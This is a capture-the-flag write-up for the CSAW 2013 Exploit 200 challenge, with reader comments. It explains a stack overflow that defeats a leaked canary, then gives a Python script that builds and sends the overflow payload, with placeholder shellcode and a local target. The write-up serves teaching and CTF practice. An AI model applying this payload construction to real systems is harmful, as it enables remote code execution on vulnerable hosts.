Monday, September 23, 2013

CSAW 2013 Exploit 200



Credit to Ryan

The first thing we did for this challenge was to look at the program headers:



From the headers we can see that the stack is mapped readable, writable and executable, so as long as we can overflow the buffer we should be able to place shellcode on the stack and return into it. Looking at the assembly in IDA Pro we see a few interesting lines.




From the assembly we can work out what the stack frame will look like at run time:



As we can see from the assembly, the program does the following:
1.      Create a random canary value and save it in VAR_C
2.      Send the address of the start of BUF
3.      Send the canary value
4.      Send the string “Welcome to CSAW CTF.  Exploitation 2 will be a little harder this year.  Insert your exploit here:”
5.      Receive up to 4096 bytes and store them in BUF
6.      Return if the canary value has not been changed, otherwise exit the program
So the program reads up to 4096 bytes into a 2048-byte buffer, and before it does so it leaks both the address of the buffer and the canary. Because the canary is checked before the function returns, the overflow has to write the leaked canary back into VAR_C at exactly its original position, fill everything between the canary and the saved return address with junk, and then overwrite the saved return address with the leaked buffer address so that the return lands in our shellcode. VAR_C is IDA's name for ebp-0xC, so after the 4-byte canary there are 8 more bytes of frame and the 4-byte saved ebp before the return address at ebp+4, which is where 12 bytes of filler come from. So we need to write an exploit program that sends shellcode (padded out to the canary), then the canary value, then the filler, then the buffer address, to get the flag.
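The following is an added example of that payload construction, not the exploit script from the original writeup. It parses the two leaked 32-bit values from the program's first output, then lays out the buffer in the order described above (NOP sled, shellcode, padding up to the canary, the canary itself, 12 bytes of filler, and the buffer address as the new return address). The gap between the end of BUF and VAR_C (`PAD_LEN`) is an assumed value that the real exploit would take from the disassembly, and the shellcode is a placeholder of `int3` bytes; the host and port passed to `exploit()` are likewise hypothetical.

```python
import socket
import struct

# Values taken from the writeup.
BUF_SIZE = 2048    # size of BUF on the stack
RECV_SIZE = 4096   # the program recv()s up to this many bytes into BUF
# VAR_C is ebp-0xC: 4 bytes of canary, 8 more bytes of frame, 4 bytes of
# saved ebp, then the saved return address at ebp+4.
FILLER_AFTER_CANARY = 12

# ASSUMED: bytes between the end of BUF and VAR_C (the "PAD" of the original
# script). The real value is read from the disassembly, not from this page.
PAD_LEN = 8

# Placeholder standing in for real x86 shellcode (23 int3 instructions).
SHELLCODE = b"\xcc" * 23


def parse_leak(data):
    """Split the program's initial output into (buf_addr, canary, rest).

    The binary sends the address of BUF, then the canary, then the welcome
    banner; both values are little-endian 32-bit since the target is x86.
    """
    if len(data) < 8:
        raise ValueError("need at least 8 leaked bytes")
    buf_addr, canary = struct.unpack("<II", data[:8])
    return buf_addr, canary, data[8:]


def build_payload(buf_addr, canary, shellcode=SHELLCODE, pad_len=PAD_LEN):
    """Build the overflow: BUF is filled with a NOP sled and the shellcode,
    the canary is written back in place, and the saved return address is
    replaced with the leaked address of BUF."""
    if len(shellcode) > BUF_SIZE:
        raise ValueError("shellcode does not fit in BUF")
    nop_sled = b"\x90" * (BUF_SIZE - len(shellcode))
    payload = (
        nop_sled
        + shellcode
        + b"A" * pad_len                  # reach VAR_C
        + struct.pack("<I", canary)       # canary must be unchanged
        + b"B" * FILLER_AFTER_CANARY      # rest of frame + saved ebp
        + struct.pack("<I", buf_addr)     # saved return address -> top of BUF
    )
    if len(payload) > RECV_SIZE:
        raise ValueError("payload exceeds what recv() will read")
    return payload


def recv_exact(sock, n):
    """recv() may return fewer bytes than asked for; loop until we have n."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError("connection closed before leak was received")
        buf += chunk
    return buf


def exploit(host, port):
    """Connect, read the two leaked values, send the payload, return the socket
    so the caller can talk to whatever the shellcode spawned."""
    sock = socket.create_connection((host, port))
    buf_addr, canary, _ = parse_leak(recv_exact(sock, 8))
    sock.recv(RECV_SIZE)  # consume the banner
    sock.sendall(build_payload(buf_addr, canary))
    return sock


if __name__ == "__main__":
    # Hypothetical target; the original write-up does not give host or port.
    exploit("127.0.0.1", 31337)
```

Because the leaked address points at the start of BUF and the sled occupies the front of the buffer, the return lands on the first NOP and slides into the shellcode; the sled is not strictly required when the address is exact, but it keeps the payload working if the buffer shifts by a few bytes.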

Flag = 53666e040caa855a9b27194c82a26366

key{53666e040caa855a9b27194c82a26366}

4 comments:

  1. Hello, I am new to exploit tasks. I tried to solve this challenge, but my exploit code works excellently on my local computer and binds a shell to 127.0.0.1 port 11111. But when I send the code to the remote server my code does not work.
    I am trying to understand what is wrong.
    I got shellcodes from http://shell-storm.org/ instead of developing my own.
    I tried all the TCP shellcodes; most of them work correctly on my local computer, but on the remote server they do not work.

    Do you use your own developed shellcode?
    The given ELF file is x86 32-bit; my local computer is Ubuntu 32-bit.
    I think the server OS should be compatible.

    Also I read your Python file and saw this string:

    # Create NOP sled
    nop_sled = '\x90' * (BUFF_SIZE - len(shellcode) - len(PAD) )

    # Exploit to send to server
    exploit = nop_sled + shellcode + PAD + canary + filler + buf_address

    Why do you add the NOP string?

    My code was like:
    exploit = shellcode + CalculatedPadding + canary + 12bytepadding + buf_address

    After the ret instruction EIP is at the start of the shellcode, so why do you add additional padding with NOPs?

  2. Why problem make when you no problem have you don't want to make.

  3. My main question is:

    Why do you add a NOP sled?

    # Exploit to send to server
    exploit = nop_sled + shellcode + PAD + canary + filler + buf_address

    After the ret instruction EIP is at the start of the shellcode, so why do you add additional padding with NOPs?

  4. Hello, I don't know if this blog is still alive, however I want to know why there is a 12-byte padding after the canary (before the return address). Why is that? Can anyone please explain? Thanks.
